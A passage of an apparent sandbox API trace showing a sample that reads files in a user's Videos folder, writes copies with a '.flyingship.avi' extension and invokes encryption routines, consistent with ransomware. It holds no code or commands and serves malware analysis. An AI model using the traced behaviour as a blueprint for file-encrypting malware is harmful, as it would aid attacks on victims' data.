[0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0197.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x900378 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900378 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0197.841] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho")) returned 0x10 [0197.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0197.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0197.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0197.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0197.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\vgcmna4csdu wvha.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0197.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0197.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0197.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0197.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0197.845] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0197.845] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0197.993] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x39cc, lpOverlapped=0x0) returned 1 [0197.993] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0197.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x139cc) returned 0xbea018 [0197.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0197.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0197.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x139cc) returned 0xa5f008 [0197.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.997] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0197.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x139cc) returned 0xbea018 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.998] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0197.998] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.998] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0197.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x139cc) returned 0xbea018 [0197.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x139cc) returned 0xa729e0 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0198.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0198.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0198.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.002] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0198.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.002] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.003] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | 